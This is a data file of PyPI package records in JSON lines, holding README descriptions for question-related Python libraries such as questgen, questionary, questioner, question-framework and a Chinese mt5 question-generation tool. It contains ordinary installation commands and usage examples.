\u043e\u0431\u043e\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f \u0432 \u0432\u0438\u0437\u0443\u0430\u043b\u0438\u0437\u0430\u0442\u043e\u0440\u0435\u041e\u0442\u043e\u0431\u0440\u0430\u0436\u0430\u0435\u0442\u0441\u044f \u0433\u0440\u0430\u0444 \u043a\u0432\u0435\u0441\u0442\u0430 \u0431\u0435\u0437 \u043c\u043e\u0434\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0439 (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0441\u043e \u0432\u0441\u0435\u043c\u0438 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0430\u043c\u0438 \u0441\u043e\u0431\u044b\u0442\u0438\u044f, \u0441\u043c. 
\u0434\u0430\u043b\u0435\u0435).\u0441\u0435\u0440\u044b\u0435 \u0443\u0437\u043b\u044b \u2014 \u043d\u0430\u0447\u0430\u043b\u043e \u0438 \u043e\u043a\u043e\u043d\u0447\u0430\u043d\u0438\u0435 \u0437\u0430\u0434\u0430\u043d\u0438\u044f;\u0444\u0438\u043e\u043b\u0435\u0442\u043e\u0432\u044b\u0435 \u0443\u0437\u043b\u044b \u2014 \u0442\u043e\u0447\u043a\u0438 \u0432\u044b\u0431\u043e\u0440\u0430;\u0437\u0435\u043b\u0451\u043d\u044b\u0435 \u0443\u0437\u043b\u044b \u2014 \u043e\u0431\u044b\u0447\u043d\u044b\u0435 \u0442\u043e\u0447\u043a\u0438 \u0441\u044e\u0436\u0435\u0442\u0430;\u043a\u0440\u0430\u0441\u043d\u044b\u0435 \u0443\u0437\u043b\u044b \u2014 \u0443\u0441\u043b\u043e\u0432\u043d\u044b\u0435 \u043f\u0435\u0440\u0435\u0445\u043e\u0434\u044b;\u0431\u0438\u0440\u044e\u0437\u043e\u0432\u044b\u0435 \u043a\u043e\u043d\u0442\u0443\u0440\u044b \u2014 \u043f\u043e\u0434\u043a\u0432\u0435\u0441\u0442\u044b;\u0431\u043e\u043b\u0435\u0435 \u0442\u0451\u043c\u043d\u044b\u043c \u0444\u043e\u043d\u043e\u043c \u043d\u0430 \u0432 \u0443\u0437\u043b\u0430\u0445 \u043e\u0442\u043c\u0435\u0447\u0435\u043d\u044b \u0442\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u044f \u043a \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0434\u043e\u043b\u0436\u043d\u044b \u0431\u044b\u0442\u044c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u044b \u0434\u043b\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u043f\u0435\u0440\u0435\u0445\u043e\u0434\u0430 \u0432 \u044d\u0442\u0443 \u0442\u043e\u0447\u043a\u0443 \u0441\u044e\u0436\u0435\u0442\u0430;\u0431\u043e\u043b\u0435\u0435 \u0441\u0432\u0435\u0442\u043b\u044b\u043c \u0444\u043e\u043d\u043e\u043c \u0432\u044b\u0434\u0435\u043b\u0435\u043d\u044b \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0434\u043e\u043b\u0436\u043d\u044b \u0431\u044b\u0442\u044c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u044b \u0441\u0440\u0430\u0437\u0443 \u043f\u043e\u0441\u043b\u0435 \u043f\u0435\u0440\u0435\u0445\u043e\u0434\u0430 \u0432 \u0442\u043e\u0447\u043a\u0443 \u0441\u044e\u0436\u0435\u0442\u0430.\u0436\u0451\u043b\u0442\u044b\u0435 \u043a\u043e\u043d\u0442\u0443\u0440\u044b \u2014 \u0441\u043e\u0431\u044b\u0442\u0438\u044f;\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430pip install git+git://github.com/Tiendil/questgen.git#egg=Questgen\u041f\u0440\u0438\u043d\u0446\u0438\u043f \u0440\u0430\u0431\u043e\u0442\u044b\u0421\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u044f \u043c\u0438\u0440\u0430 \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u0432\u0438\u0434\u0435 \u043f\u0440\u0435\u0434\u0438\u043a\u0430\u0442\u043e\u0432 \u0432\u0440\u043e\u0434\u0435LocatedIn(object='hero',place='place_1')\u0438 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u044e\u0442\u0441\u044f \u0432 \u0431\u0430\u0437\u0443 \u0437\u043d\u0430\u043d\u0438\u0439 (\u0411\u0417)\u0417\u0430\u0434\u0430\u043d\u0438\u0435 \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043e\u0440\u0438\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u043c \u0433\u0440\u0430\u0444\u043e\u043c \u0441 \u043e\u0434\u043d\u043e\u0439 \u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0439 \u0432\u0435\u0440\u0448\u0438\u043d\u043e\u0439 \u0438 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u043c\u0438 \u043a\u043e\u043d\u0435\u0447\u043d\u044b\u043c\u0438 
(\u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0442\u043e\u0436\u0435 \u0445\u0440\u0430\u043d\u0438\u0442\u0441\u044f \u0432 \u0411\u0417).\u043a\u0430\u0436\u0434\u0430\u044f \u0432\u0435\u0440\u0448\u0438\u043d\u0430 \u0438\u043c\u0435\u0435\u0442 \u0441\u043f\u0438\u0441\u043e\u043a \u0442\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0434\u043e\u043b\u0436\u043d\u044b \u0431\u044b\u0442\u044c \u0443\u0434\u043e\u0432\u043b\u0435\u0442\u0432\u043e\u0440\u0435\u043d\u044b, \u043f\u0440\u0435\u0436\u0434\u0435 \u0447\u0435\u043c \u043c\u043e\u0436\u043d\u043e \u0431\u0443\u0434\u0435\u0442 \u043f\u0435\u0440\u0435\u0439\u0442\u0438 \u0432 \u043d\u0435\u0451 (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0433\u0435\u0440\u043e\u0439 \u0434\u043e\u043b\u0436\u0435\u043d \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u044c\u0441\u044f \u0432 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e\u043c \u043c\u0435\u0441\u0442\u0435);\u043a\u0430\u0436\u0434\u0430\u044f \u0432\u0435\u0440\u0448\u0438\u043d\u0430 \u0438\u043c\u0435\u0435\u0442 \u0441\u043f\u0438\u0441\u043e\u043a \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0434\u043e\u043b\u0436\u043d\u044b \u0431\u044b\u0442\u044c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u044b, \u043a\u043e\u0433\u0434\u0430 \u043c\u044b \u0432 \u043d\u0435\u0451 \u043f\u0435\u0440\u0435\u0448\u043b\u0438;\u043a\u0430\u0436\u0434\u0430\u044f \u0434\u0443\u0433\u0430 \u0438\u043c\u0435\u0435\u0442 \u0434\u0432\u0430 \u0441\u043f\u0438\u0441\u043a\u0430 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439:\n* \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0434\u043e\u043b\u0436\u043d\u044b \u0431\u044b\u0442\u044c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u044b, \u043a\u043e\u0433\u0434\u0430 \u043c\u044b \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u043c \u0434\u0432\u0438\u0433\u0430\u0442\u044c\u0441\u044f \u043f\u043e \u0434\u0443\u0433\u0435;\n* \u043a\u043e\u0433\u0434\u0430 \u043c\u044b \u0437\u0430\u043a\u0430\u043d\u0447\u0438\u0432\u0430\u0435\u043c \u0434\u0432\u0438\u0433\u0430\u0442\u044c\u0441\u044f \u043f\u043e \u0434\u0443\u0433\u0435 (\u0442.\u0435. 
\u043f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u043c \u0432 \u043d\u043e\u0432\u0443\u044e \u0432\u0435\u0440\u0448\u0438\u043d\u0443 \u043f\u043e\u0441\u043b\u0435 \u0443\u0434\u043e\u0432\u043b\u0435\u0442\u0432\u043e\u0440\u0435\u043d\u0438\u044f \u0432\u0441\u0435\u0445 \u0435\u0451 \u0442\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u0439);\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0442\u0438\u043f\u043e\u0432 \u0432\u0435\u0440\u0448\u0438\u043d:\n* \u041d\u0430\u0447\u0430\u043b\u044c\u043d\u0430\u044f \u2014 \u043e\u0434\u043d\u0430 \u043d\u0430 \u0437\u0430\u0434\u0430\u043d\u0438\u0435, \u0441 \u043d\u0435\u0451 \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u00ab\u043f\u0443\u0442\u0435\u0448\u0435\u0441\u0442\u0432\u0438\u0435\u00bb;\n* \u041a\u043e\u043d\u0435\u0447\u043d\u0430\u044f \u2014 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043d\u0430 \u0437\u0430\u0434\u0430\u043d\u0438\u0435, \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u044f\u0435\u0442 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f (\u0434\u043b\u044f \u0441\u0442\u044b\u043a\u043e\u0432\u043a\u0438 \u0441 \u0434\u0440\u0443\u0433\u0438\u043c\u0438 \u0437\u0430\u0434\u0430\u043d\u0438\u044f\u043c\u0438);\n* \u043e\u0431\u044b\u0447\u043d\u0430\u044f \u2014 \u0443\u0437\u0435\u043b \u0438\u0441\u0442\u043e\u0440\u0438\u0438, \u043c\u043e\u0436\u0435\u0448\u044c \u0438\u043c\u0435\u0442\u044c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0432\u0445\u043e\u0434\u044f\u0449\u0438\u0445 \u0434\u0443\u0433 \u0438 \u0440\u043e\u0432\u043d\u043e \u043e\u0434\u043d\u0443 \u0438\u0441\u0445\u043e\u0434\u044f\u0449\u0443\u044e;\n* \u0432\u044b\u0431\u043e\u0440 \u2014 \u043c\u043e\u0436\u0435\u0442 \u0438\u043c\u0435\u0442\u044c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0438\u0441\u0445\u043e\u0434\u044f\u0449\u0438\u0445 \u0434\u0443\u0433, \u043c\u0435\u0436\u0434\u0443 \u043a\u043e\u0442\u043e\u0440\u044b\u043c\u0438 \u043c\u043e\u0436\u043d\u043e \u043f\u0435\u0440\u0435\u043a\u043b\u044e\u0447\u0430\u0442\u044c\u0441\u044f, \u043f\u043e\u043a\u0430 \u043d\u0435 \u043f\u0440\u0438\u0448\u043b\u0438 \u0432 \u043e\u0434\u043d\u0443 \u0438\u0437 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0432\u0435\u0440\u0448\u0438\u043d;\u041d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0432\u0435\u0440\u0448\u0438\u043d \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u043e\u0431\u044a\u0435\u0434\u0438\u043d\u0435\u043d\u044b \u0432 \u00ab\u0441\u043e\u0431\u044b\u0442\u0438\u0435\u00bb, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0440\u0430\u0441\u043a\u0440\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043f\u0440\u0438 \u0437\u0430\u0432\u0435\u0440\u0448\u0435\u043d\u0438\u0438 \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u0433\u0440\u0430\u0444\u0430, \u0443\u0434\u0430\u043b\u044f\u044f \u0432\u0441\u0435 \u0432\u0435\u0440\u0448\u0438\u043d\u044b \u043a\u0440\u043e\u043c\u0435 \u043e\u0434\u043d\u043e\u0439. 
\u0422\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u043c\u043e\u0436\u043d\u043e \u0434\u0435\u043b\u0430\u0442\u044c \u0441\u043b\u0443\u0447\u0430\u0439\u043d\u044b\u0435 \u0441\u043e\u0431\u044b\u0442\u0438\u044f.\u041e\u0431\u0449\u0438\u0439 \u043f\u043e\u0440\u044f\u0434\u043e\u043a \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438:\u0441\u043e\u0437\u0434\u0430\u0442\u044c \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u043c\u0438\u0440\u0430;\u0441\u043e\u0437\u0434\u0430\u0442\u044c \u0437\u0430\u0434\u0430\u043d\u0438\u0435;\u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u0437\u0430\u0434\u0430\u043d\u0438\u0435 (\u0441\u043c. \u043f\u0440\u0438\u043c\u0435\u0440 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0434\u0430\u043b\u0435\u0435);\u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u043d\u0430 \u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e\u0441\u0442\u044c;\u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u0441 \u043a\u0432\u0435\u0441\u0442\u043e\u043c \u0432 \u043a\u043e\u0434\u0435 \u0438\u0433\u0440\u044b (\u0438\u0433\u0440\u0430 \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u0435\u0442 \u043a\u043e\u0434, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u043f\u0440\u0438 \u043f\u0440\u043e\u0445\u043e\u0434\u0435 \u043f\u043e \u0433\u0440\u0430\u0444\u0443).\u0421\u043b\u0435\u0434\u0443\u0435\u0442 \u043f\u043e\u043c\u043d\u0438\u0442\u044c, \u0447\u0442\u043e \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u044f \u0437\u0430\u0434\u0430\u043d\u0438\u044f \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043d\u0435\u0443\u0434\u0430\u0447\u043d\u043e\u0439 (\u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0438\u0441\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 questgen.exceptions.RollBackError). \u042d\u0442\u043e \u043d\u0435 \u0437\u043d\u0430\u0447\u0438\u0442, \u0447\u0442\u043e \u0432\u0441\u0451 \u043f\u043b\u043e\u0445\u043e, \u044d\u0442\u043e \u0437\u043d\u0430\u0447\u0438\u0442, \u0447\u0442\u043e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043f\u043e\u0432\u0442\u043e\u0440\u0438\u0442\u044c \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u044e, \u0442.\u043a. 
an unusable quest graph was formed. It follows that, for better and faster quest generation, it is better to have a larger world, so that there are fewer collisions. Example: see ./helpers/example.py. Visualization: the visualizer ./helpers/visualizer.py creates images of the quest templates in ./questgen/svgs/. It uses graphviz via the pygraph library. If the generated images come out wrong (skewed), install a newer version of graphviz"} +{"package": "questionare", "pacakge-description": "Questionare by CraftYun83. This is a simple library that lets you make surveys super easily with just a few commands!Commands: questionare.help, questionare.addQuestion, questionare.deleteQuestion, questionare.printQuestions, questionare.setFinishedText, questionare.start, questionare.answers, questionare.reset"} +{"package": "questionary", "pacakge-description": "Questionary\u2728 Questionary is a Python library for effortlessly building pretty command line interfaces \u2728FeaturesInstallationUsageDocumentationSupportimport questionary\nquestionary.text(\"What's your first name\").ask()\nquestionary.password(\"What's your secret?\").ask()\nquestionary.confirm(\"Are you amazed?\").ask()\nquestionary.select(\"What do you want to do?\",choices=[\"Order a pizza\",\"Make a reservation\",\"Ask for opening hours\"],).ask()\nquestionary.rawselect(\"What do you want to do?\",choices=[\"Order a pizza\",\"Make a reservation\",\"Ask for opening hours\"],).ask()\nquestionary.checkbox(\"Select toppings\",choices=[\"foo\",\"bar\",\"bazz\"]).ask()\nquestionary.path(\"Path to the project's version file\").ask()\nUsed and supported byFeaturesQuestionary supports the following input prompts:Text, Password, File Path, Confirmation, Select, Raw select, Checkbox, AutocompleteThere is also a helper to print formatted text for when you want to spice up your printed messages a bit.InstallationUse the package manager pip to install Questionary:$ pip install questionary\n\u2728\ud83c\udf82\u2728Usageimport questionary\nquestionary.select(\"What do you want to do?\",choices=['Order a pizza','Make a reservation','Ask for opening hours']).ask()# returns value of selectionThat's all it takes to create a prompt! 
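For instance, here is a minimal sketch of a small script that chains a few of the prompts shown above (the question wording and the choice list are made-up examples, not part of the library):
import questionary

# each .ask() call renders one prompt and returns the user's answer
name = questionary.text('What is your name?').ask()
hungry = questionary.confirm('Order a pizza?').ask()
topping = questionary.select('Pick a topping', choices=['cheese', 'mushrooms', 'pepperoni']).ask()
print(name, hungry, topping)
The answers come back as plain Python values, so they can be fed straight into the rest of the program.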
Have a look at the documentation for some more examples.DocumentationDocumentation for Questionary is available here.SupportPlease open an issue with enough information for us to reproduce your problem.\nA minimal, reproducible example would be very helpful.ContributingContributions are very much welcomed and appreciated. Head over to the documentation on how to contribute.Authors and AcknowledgmentQuestionary is written and maintained by Tom Bocklisch and Kian Cross.It is based on the great work by Oyetoke Toby and Mark Fink.LicenseLicensed under the MIT License. Copyright 2021 Tom Bocklisch."} +{"package": "questionbuilder", "pacakge-description": "No description available on PyPI."} +{"package": "question-creation-app-realpython", "pacakge-description": "No description available on PyPI."} +{"package": "question-creation-distributable-app", "pacakge-description": "No description available on PyPI."} +{"package": "question-creator-distributable", "pacakge-description": "No description available on PyPI."} +{"package": "question-creator-distributable-bundled", "pacakge-description": "No description available on PyPI."} +{"package": "question-creator-distributable-bundled-01", "pacakge-description": "No description available on PyPI."} +{"package": "question-creator-distributable-bundled-02", "pacakge-description": "No description available on PyPI."} +{"package": "question-creator-distributable-pip", "pacakge-description": "No description available on PyPI."} +{"package": "questioner", "pacakge-description": "QuestionerA human-friendly Python library for asking people questions on the command-line.MotivationData often needs a human eye. I found myself writing over and over the code to help me investigate data manually on the command-line; questioner is my attempt to make this tool the right way once.It's suitable for: Labelling data manually, faster than you can in Excel spreadsheets or similar setups; Active learning loops, where you and a machine-learning agent collaborate, reducing the need for training data; Short question-based UIs on the command-line, where you need a user's input to continue.UsagePython APIYou write a simple Python API that asks you things.import questioner\nwith questioner.Cli() as c:\n    is_hurt = c.yes_or_no('Are you hurt')\n    symptom_set = c.choose_many('What symptoms do you have?', ['pain', 'nausea', 'anxiety'])\n    rating = c.give_an_int('How would you rate this experience (1-5)', 1, 5)\n    choice = c.choose_one('Which do you like best', ['dogs', 'cats', 'horses'])On the terminalWhen run, the experience on the terminal looks like the following:$ python -m questioner.demo\nAre you hurt? (y/n) n\n\nWhat symptoms do you have?\n pain? (y/n) y\n nausea? (y/n) n\n anxiety? (y/n) n\n\nHow would you rate this experience (1-5)\n3\n\nWhich do you like best\n 0. dogs\n 1. cats\n 2. 
horses\n1The user can by default skip a question (raising QuestionSkipped) by pressing enter, or quit the entire CLI by pressing q (raising QuitCli).FeaturesSupport for boolean, numeric, single-choice and multiple-choice questionsUses single-keystroke input where possibleLicenseMIT licensed.History0.1.0 (2019-02-15)First release on PyPI."} +{"package": "question-extractor", "pacakge-description": "No description available on PyPI."} +{"package": "questionextractorpackage", "pacakge-description": "No description available on PyPI."} +{"package": "questionflow", "pacakge-description": "A simple tool for managing your question and answer workflow."} +{"package": "question-framework", "pacakge-description": "Question Framework helps you to ask questions and get answers in a declarative way!Question FrameworkBasic Usagefrom question_framework.question import Question, RepeatedQuestion, BranchedQuestion\nfrom question_framework.user_input import ask\nquestions=[Question(\"Name\",\"Your name:\")]\nanswers=ask(questions)\nprint(answers)Output:Your name:\nfoobar\n{'Name': 'foobar'}Question TypesQuestionQuestion is basically a question with an answer.questions=[Question(\"Name\",\"Your name:\")]\nanswers=ask(questions)\nprint(answers)Output:Your name:\nJohn Doe\n{'Name': 'John Doe'}Repeated QuestionRepeatedQuestion can be used to ask the same question consecutively.questions=[RepeatedQuestion(\"Password\",\"Your password:\",2)]\nanswers=ask(questions)\nprint(answers)Output:Your password: 123\nYour password: 321\nYour password: 765\n{'Password': ['123', '321', '765']}Branched QuestionBranchedQuestion can be used to create one-way adventures.game=[BranchedQuestion(\"Main\",\"Where to go? [N | E | S | W]\",[Question(\"N\",\"North is cold. You died! (type anything to exit)\"),Question(\"E\",\"You triggered the trap. (type anything to exit)\"),BranchedQuestion(\"S\",\"You found a treasure chest! [open | leave]\",[Question(\"open\",\"It was a trap! (type anything to exit)\"),Question(\"leave\",\"You leave the cave.. (type anything to exit)\"),]),Question(\"W\",\"West is wild, you died! (type anything to exit)\"),])]\nanswers=ask(game)Static Answers\"StaticAnswer\" can be used to provide a default value.from question_framework.question import BranchedQuestion, StaticAnswer, Question\nquestions=[BranchedQuestion(\"password\",\"Do you want to enter a password? [y|n]\",[Question(\"y\",\"What is your password?\"),StaticAnswer(\"n\",\"No password.\")])]\nanswers=ask(questions)Output:Do you want to enter a password? [y|n] n\n{'password': {'n': 'No password.', '__answer': 'n'}}ValidationsA validation function can be specified to validate answers. If validation fails, the user will be asked to enter the input again.Question(\"Password\",\"Enter password:\",validation=lambda x: len(x)>5)Validation Error MessagesWhen a user provides input that does not satisfy a validation function, it may be desirable to give them a message. 
The ValidationError exception allows this.To use, raise the ValidationError exception from your validation function with your desired message.from question_framework.question import Question\nfrom question_framework.user_input import ask\nfrom question_framework.validation import ValidationError\ndef is_not_blank(x):\n    if not x:\n        raise ValidationError(\"Your answer may not be blank.\")\n    return True\nquestions=[Question(\"Name\",\"Your name:\",validation=is_not_blank)]\nanswers=ask(questions)Output:Your name:\nYour answer may not be blank.\nYour name:\nDavid\n{'Name': 'David'}Post processA post process can be specified to transform the answer.Question(\"Firstname\",\"Enter firstname:\",post_process=lambda x: x.upper())"} +{"package": "question-generation", "pacakge-description": "Chinese question generation based on mt5 (documentation: Chinese | English).A question generation model fine-tuned from the pretrained mt5 model.Online demoYou can try our model directly online at https://www.algolet.com/applications/qg UsageWe provide pipeline APIs for question_generation and question_answering; by calling the corresponding pipeline, the corresponding task can be performed easily.Below is how to use the question generation pipeline:>>> from question_generation import pipeline# Allocate a pipeline for question-generation# cpu version; if the device argument is not passed, cpu is the default>>>qg=pipeline(\"question-generation\",device=\"cpu\")# gpu version>>>qg=pipeline(\"question-generation\",device=\"cuda\")# for single text>>>qg(\"\u5728\u4e00\u4e2a\u5bd2\u51b7\u7684\u51ac\u5929\uff0c\u8d76\u96c6\u5b8c\u56de\u5bb6\u7684\u519c\u592b\u5728\u8def\u8fb9\u53d1\u73b0\u4e86\u4e00\u6761\u51bb\u50f5\u4e86\u7684\u86c7\u3002\u4ed6\u5f88\u53ef\u601c\u86c7\uff0c\u5c31\u628a\u5b83\u653e\u5728\u6000\u91cc\u3002\u5f53\u4ed6\u8eab\u4e0a\u7684\u70ed\u6c14\u628a\u86c7\u6e29\u6696\u4ee5\u540e\uff0c\u86c7\u5f88\u5feb\u82cf\u9192\u4e86\uff0c\u9732\u51fa\u4e86\u6b8b\u5fcd\u7684\u672c\u6027\uff0c\u7ed9\u4e86\u519c\u592b\u81f4\u547d\u7684\u4f24\u5bb3\u2014\u2014\u54ac\u4e86\u519c\u592b\u4e00\u53e3\u3002\u519c\u592b\u4e34\u6b7b\u4e4b\u524d\u8bf4\uff1a\u201c\u6211\u7adf\u7136\u6551\u4e86\u4e00\u6761\u53ef\u601c\u7684\u6bd2\u86c7\uff0c\u5c31\u5e94\u8be5\u53d7\u5230\u8fd9\u79cd\u62a5\u5e94\u554a\uff01\u201d\")['\u5728\u5bd2\u51b7\u7684\u51ac\u5929,\u519c\u592b\u5728\u54ea\u91cc\u53d1\u73b0\u4e86\u4e00\u6761\u53ef\u601c\u7684\u86c7?','\u519c\u592b\u662f\u5982\u4f55\u770b\u5f85\u86c7\u7684?','\u5f53\u519c\u592b\u9047\u5230\u86c7\u65f6,\u4ed6\u505a\u4e86\u4ec0\u4e48?']# for batch 
input>>>texts=[\"\u5728\u4e00\u4e2a\u5bd2\u51b7\u7684\u51ac\u5929\uff0c\u8d76\u96c6\u5b8c\u56de\u5bb6\u7684\u519c\u592b\u5728\u8def\u8fb9\u53d1\u73b0\u4e86\u4e00\u6761\u51bb\u50f5\u4e86\u7684\u86c7\u3002\u4ed6\u5f88\u53ef\u601c\u86c7\uff0c\u5c31\u628a\u5b83\u653e\u5728\u6000\u91cc\u3002\u5f53\u4ed6\u8eab\u4e0a\u7684\u70ed\u6c14\u628a\u86c7\u6e29\u6696\u4ee5\u540e\uff0c\u86c7\u5f88\u5feb\u82cf\u9192\u4e86\uff0c\u9732\u51fa\u4e86\u6b8b\u5fcd\u7684\u672c\u6027\uff0c\u7ed9\u4e86\u519c\u592b\u81f4\u547d\u7684\u4f24\u5bb3\u2014\u2014\u54ac\u4e86\u519c\u592b\u4e00\u53e3\u3002\u519c\u592b\u4e34\u6b7b\u4e4b\u524d\u8bf4\uff1a\u201c\u6211\u7adf\u7136\u6551\u4e86\u4e00\u6761\u53ef\u601c\u7684\u6bd2\u86c7\uff0c\u5c31\u5e94\u8be5\u53d7\u5230\u8fd9\u79cd\u62a5\u5e94\u554a\uff01\u201d\"]>>>qg(texts)[['\u5728\u5bd2\u51b7\u7684\u51ac\u5929,\u519c\u592b\u5728\u54ea\u91cc\u53d1\u73b0\u4e86\u4e00\u6761\u53ef\u601c\u7684\u86c7?','\u519c\u592b\u662f\u5982\u4f55\u770b\u5f85\u86c7\u7684?','\u5f53\u519c\u592b\u9047\u5230\u86c7\u65f6,\u4ed6\u505a\u4e86\u4ec0\u4e48?']]\u53ef\u4ee5\u4f7f\u7528\u4f60\u81ea\u5df1\u8bad\u7ec3\u7684\u6a21\u578b\uff0c\u6216\u8005\u4e0b\u8f7dhuggingface hub\u4e2d\u5df2\u7ecf\u5fae\u8c03\u597d\u7684\u6a21\u578b. PyTorch\u7248\u672c\u7684\u4f7f\u7528\u65b9\u5f0f\u5982\u4e0b:>>>fromtransformersimportAutoTokenizer,AutoModelForSeq2SeqLM>>>tokenizer=AutoTokenizer.from_pretrained(\"algolet/mt5-base-chinese-qg\")>>>model=AutoModelForSeq2SeqLM.from_pretrained(\"algolet/mt5-base-chinese-qg\")>>>pipe=pipeline(\"question-generation\",model=model,tokenizer=tokenizer)\u540c\u65f6\uff0c\u6211\u4eec\u4e5f\u63d0\u4f9b\u7684\u95ee\u7b54pipeline,\u53ef\u4ee5\u4e0e\u95ee\u9898\u751f\u6210\u6a21\u5757\u96c6\u6210\uff0c\u4ea7\u751f\u95ee\u9898\u81ea\u52a8\u751f\u6210\u4e0e\u56de\u7b54\u7684\u5e94\u7528\u3002\u4e0b\u9762\u662f\u5982\u4f55\u4f7f\u7528\u95ee\u7b54pipeline>>>fromquestion_generationimportpipeline# Allocate a pipeline for question-generation>>>qa=pipeline(\"question-answering\")>>>text=\"\u5728\u4e00\u4e2a\u5bd2\u51b7\u7684\u51ac\u5929\uff0c\u8d76\u96c6\u5b8c\u56de\u5bb6\u7684\u519c\u592b\u5728\u8def\u8fb9\u53d1\u73b0\u4e86\u4e00\u6761\u51bb\u50f5\u4e86\u7684\u86c7\u3002\u4ed6\u5f88\u53ef\u601c\u86c7\uff0c\u5c31\u628a\u5b83\u653e\u5728\u6000\u91cc\u3002\u5f53\u4ed6\u8eab\u4e0a\u7684\u70ed\u6c14\u628a\u86c7\u6e29\u6696\u4ee5\u540e\uff0c\u86c7\u5f88\u5feb\u82cf\u9192\u4e86\uff0c\u9732\u51fa\u4e86\u6b8b\u5fcd\u7684\u672c\u6027\uff0c\u7ed9\u4e86\u519c\u592b\u81f4\u547d\u7684\u4f24\u5bb3\u2014\u2014\u54ac\u4e86\u519c\u592b\u4e00\u53e3\u3002\u519c\u592b\u4e34\u6b7b\u4e4b\u524d\u8bf4\uff1a\u201c\u6211\u7adf\u7136\u6551\u4e86\u4e00\u6761\u53ef\u601c\u7684\u6bd2\u86c7\uff0c\u5c31\u5e94\u8be5\u53d7\u5230\u8fd9\u79cd\u62a5\u5e94\u554a\uff01\u201d\"# for single qa input>>>question_answerer({...'question':'\u5728\u5bd2\u51b7\u7684\u51ac\u5929,\u519c\u592b\u5728\u54ea\u91cc\u53d1\u73b0\u4e86\u4e00\u6761\u53ef\u601c\u7684\u86c7?',...'context':text...}){'answer':'\u8def\u8fb9','start':18,'end':20,'score':1.0}# for batch qa 
